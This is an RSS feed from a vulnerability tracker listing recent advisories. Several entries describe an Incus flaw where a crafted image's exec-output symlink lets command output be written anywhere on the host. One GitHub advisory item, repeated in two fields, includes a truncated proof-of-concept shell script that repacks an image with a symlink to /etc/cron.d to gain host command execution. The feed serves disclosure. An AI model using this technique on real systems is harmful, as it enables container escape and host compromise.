<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 17:08:24 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-15481</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-15481</link>
      <description>bdu:2026-15481</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-15481</guid>
    </item>
    <item>
      <title>EUVD-2026-359371</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-359371</link>
      <description>EUVD-2026-359371</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-359371</guid>
    </item>
    <item>
      <title>fkie_cve-2026-48750</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-48750</link>
      <description>&lt;p&gt;Incus is a system container and virtual machine manager. Prior to version 7.2.0, the `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution. Version 7.2.0 contains a patch.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Incus is a system container and virtual machine manager. Prior to version 7.2.0, the `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution. Version 7.2.0 contains a patch.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-48750</guid>
    </item>
    <item>
      <title>GHSA-73hr-m85f-64v9 — Incus has an arbitrary file write on host via `exec-output` symlink in crafted image</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-73hr-m85f-64v9</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/lxc/incus/v7/cmd/incusd&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;The `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;When an image is unpacked, top-level symlinks are extracted as is; allowing for `exec-output` to be placed on disk. In `instance_exec.go`, `os.Mkdir` continues of `exec-output` exists and `os.OpenFile` follows the `exec-output` symlink.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Below, we place the `exec_UUID.stdout` file in `/etc/cron.d` on
the host for arbitrary command execution.&lt;/p&gt;
&lt;p&gt;```
#!/bin/sh
# usage: $0 existing-imagefp
set -eu&lt;/p&gt;
&lt;p&gt;basefp=&amp;#34;${1}&amp;#34;&lt;/p&gt;
&lt;p&gt;die() {
        printf &amp;#39;%s&amp;#39; &amp;#34;${@}&amp;#34; &amp;gt;&amp;amp;2
        exit 1
}&lt;/p&gt;
&lt;p&gt;command -v curl &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 || die &amp;#39;error: curl not found\n&amp;#39;
command -v python3 &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 || die &amp;#39;error: python3 not found\n&amp;#39;&lt;/p&gt;
&lt;p&gt;tmpdir=$(mktemp -d)
cleanup() {
        rm -rf &amp;#34;${tmpdir}&amp;#34;
}
trap cleanup EXIT INT QUIT TERM HUP&lt;/p&gt;
&lt;p&gt;# insert exec-output symlink&lt;/p&gt;
&lt;p&gt;incus image export &amp;#34;${basefp}&amp;#34; &amp;#34;${tmpdir}/img&amp;#34;&lt;/p&gt;
&lt;p&gt;mkdir &amp;#34;${tmpdir}/repack&amp;#34;
cd &amp;#34;${tmpdir}/repack&amp;#34;&lt;/p&gt;
&lt;p&gt;xz -cd &amp;#34;${tmpdir}/img&amp;#34; | tar -f- -vx&lt;/p&gt;
&lt;p&gt;rm -rf exec-output
ln -s /etc/cron.d exec-output&lt;/p&gt;
&lt;p&gt;tar -f- -c * | gzip -c9 &amp;gt;&amp;#34;${tmpdir}/img&amp;#34;&lt;/p&gt;
&lt;p&gt;cd - &amp;gt;/dev/null
incus image import &amp;#34;${tmpdir}&amp;#34;/img* --alias afw-exec-output&lt;/p&gt;
&lt;p&gt;# Launch container, exec with…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/lxc/incus/v7/cmd/incusd&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;The `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;When an image is unpacked, top-level symlinks are extracted as is; allowing for `exec-output` to be placed on disk. In `instance_exec.go`, `os.Mkdir` continues of `exec-output` exists and `os.OpenFile` follows the `exec-output` symlink.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Below, we place the `exec_UUID.stdout` file in `/etc/cron.d` on
the host for arbitrary command execution.&lt;/p&gt;
&lt;p&gt;```
#!/bin/sh
# usage: $0 existing-imagefp
set -eu&lt;/p&gt;
&lt;p&gt;basefp=&amp;#34;${1}&amp;#34;&lt;/p&gt;
&lt;p&gt;die() {
        printf &amp;#39;%s&amp;#39; &amp;#34;${@}&amp;#34; &amp;gt;&amp;amp;2
        exit 1
}&lt;/p&gt;
&lt;p&gt;command -v curl &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 || die &amp;#39;error: curl not found\n&amp;#39;
command -v python3 &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 || die &amp;#39;error: python3 not found\n&amp;#39;&lt;/p&gt;
&lt;p&gt;tmpdir=$(mktemp -d)
cleanup() {
        rm -rf &amp;#34;${tmpdir}&amp;#34;
}
trap cleanup EXIT INT QUIT TERM HUP&lt;/p&gt;
&lt;p&gt;# insert exec-output symlink&lt;/p&gt;
&lt;p&gt;incus image export &amp;#34;${basefp}&amp;#34; &amp;#34;${tmpdir}/img&amp;#34;&lt;/p&gt;
&lt;p&gt;mkdir &amp;#34;${tmpdir}/repack&amp;#34;
cd &amp;#34;${tmpdir}/repack&amp;#34;&lt;/p&gt;
&lt;p&gt;xz -cd &amp;#34;${tmpdir}/img&amp;#34; | tar -f- -vx&lt;/p&gt;
&lt;p&gt;rm -rf exec-output
ln -s /etc/cron.d exec-output&lt;/p&gt;
&lt;p&gt;tar -f- -c * | gzip -c9 &amp;gt;&amp;#34;${tmpdir}/img&amp;#34;&lt;/p&gt;
&lt;p&gt;cd - &amp;gt;/dev/null
incus image import &amp;#34;${tmpdir}&amp;#34;/img* --alias afw-exec-output&lt;/p&gt;
&lt;p&gt;# Launch container, exec with…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-73hr-m85f-64v9</guid>
    </item>
    <item>
      <title>openSUSE-SU-2026:11651-1 — incus-7.4-1.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2026:11651-1</link>
      <description>&lt;p&gt;incus-7.4-1.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;incus-7.4-1.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2026:11651-1</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2026-48750</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-48750</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:16.04:LTS: lxd, Ubuntu:Pro:18.04:LTS: lxd, Ubuntu:20.04:LTS: lxd, Ubuntu:Pro:24.04:LTS: incus, Ubuntu:25.10: incus, Ubuntu:Pro:26.04:LTS: incus&lt;/p&gt;
&lt;p&gt;Incus is a system container and virtual machine manager. Prior to version 7.2.0, the `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution. Version 7.2.0 contains a patch.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:16.04:LTS: lxd, Ubuntu:Pro:18.04:LTS: lxd, Ubuntu:20.04:LTS: lxd, Ubuntu:Pro:24.04:LTS: incus, Ubuntu:25.10: incus, Ubuntu:Pro:26.04:LTS: incus&lt;/p&gt;
&lt;p&gt;Incus is a system container and virtual machine manager. Prior to version 7.2.0, the `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution. Version 7.2.0 contains a patch.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-48750</guid>
    </item>
  </channel>
</rss>
